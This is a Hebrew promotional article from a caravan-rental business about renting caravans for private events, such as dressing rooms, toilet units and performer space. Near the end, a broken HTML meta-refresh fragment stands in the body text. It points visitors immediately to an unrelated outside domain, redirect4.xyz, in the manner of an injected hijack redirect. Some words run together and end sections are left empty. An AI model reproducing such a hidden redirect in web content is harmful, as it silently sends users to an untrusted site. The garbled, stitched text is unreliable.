קראוונים לאירועים פרטיים

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

אירוע פרטי ממוצע יצריך חודשים ארוכים של תכנון – חשבו על כל אותם דברים שצריכים לקחת בחשבון במהלך שלבי הארגוןקראוונים לאירועים פרטיים השונים. לאחר שבוחרים מקום לאירוע, נדרש לוודא שהוא כולל את כל מה שדרוש לצורך הקיום המוצלח של האירוע.

קראוונים לאירועים פרטיים נכנסים לתמונה בנקודה הזו בדיוק, ויכולים להיות כלי מרכזי בקיום האירוע (בעיקר במקרה של אירועים בטבע). כפי שתראו מיד, מדובר בתחום רחב ובו מספר דברים שצריך לשים עליהם דגש אם מעוניינים שהאירוע יהיה המוצלח ביותר האפשרי.

אז למה צריך קראוון?

בין קראוונים לבין אירועים פרטיים יכולות להיות מספר נקודות השקה. ראשית, יכולים הקראוונים לשמש מקום התארגנות או התרעננות של האורחים, או לחלופין חתני האירוע: נניח, חדר בו החתן והכלה מתארגנים ביום המאושר בחייהם, מתלבשים, נחים וכן הלאה. זהו גם יכול להיות המקום בו הם לנים לאחר האירוע, במטרה (לנסות) להתאושש ממנו.

הקראוון יכול לקבל על עצמו תפקידים נוספים במקרה של אירוע פרטי. יש סוג ספציפי של קראוונים הכוללים בעיקר תאי שירותים, שמן הסתם לא יהיו חלק מהתשתית הקיימת לאירוע אם הוא נערך תחת כיפת השמיים. יש לציין בהקשר הזה שהקראוונים המשמשים למטרה זו נוטים להיות גדולים (עד שמונה תאי שירותים לרוב), מאובזרים היטב וגם מפוארים.

הקראוון עשוי להיות חלק מ”התכנית האומנותית” של האירוע המשפחתי. אם מזמינים אמן או בעל מקצועי – דוגמת זמר, קוסם או להטוטן – הם יוכלו להתארגן בקראוון, לאחסן בו את הציוד שלהם וכן הלאה.

קראוון לאירועים שוכרים, לא רוכשים

לאחר שמבינים מהם חלק מהמצבים שצריכים קראוון באירועים פרטיים, נדרש לשאול איך בדיוק עושים את זה. כמו הרבה אלמנטים אחרים בארגון אירוע, ההחלטה הברורה (או אפילו המובנת מאליה) היא לא לרכוש את הקראוון, אלא לשכור אותו לפרק זמן מסוים – רצוי עם מרווח ביטחון לפני תחילת או סיום האירוע.

השכרה מאפשרת לצמצם את העלויות בצורה משמעותית, אחת הדרישות המרכזיות בעת ארגון אירוע פרטי. כמו כן, היא מוציאה מהתמונה היערכות מיוחדת, דאגה לתחזוקה של הקראוון וכן הלאה.

לא כל קראוון מתאים לאירועים פרטיים

בין הקראוונים השונים המוצעים כיום יש לא מעט הבדלים, ומכאן שצריך להשקיע מחשבה מסוימת בבחינת הקראוון לפני שמקבלים את ההחלטה. הדבר הראשון שצריך לשאול הוא מהו הייעוד של הקראוון, שישפיע בין היתר על הגודל המצופה שלו, האבזור הפנימי וכן הלאה. כדי ללמוד על זה צריך לראות היכן בדיוק נערך האירוע, מהן האטרקציות הצפויות בו ומהו המספר המשוער של האורחים באירוע.

המלצה מועילה במצב הדברים הזה היא לפנות לחברות הפועלות בשדה המשחק, להבהיר להן את הצרכים ולראות על אילו קראוונים הן ממליצות במצב הדברים הזה. חברה שתכוון אתכם לעבר הבחירה הנכונה תגדיל את הסיכוי לכך שבסופו של יום, האירוע יהיה מוצלח בכל קנה מידה.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר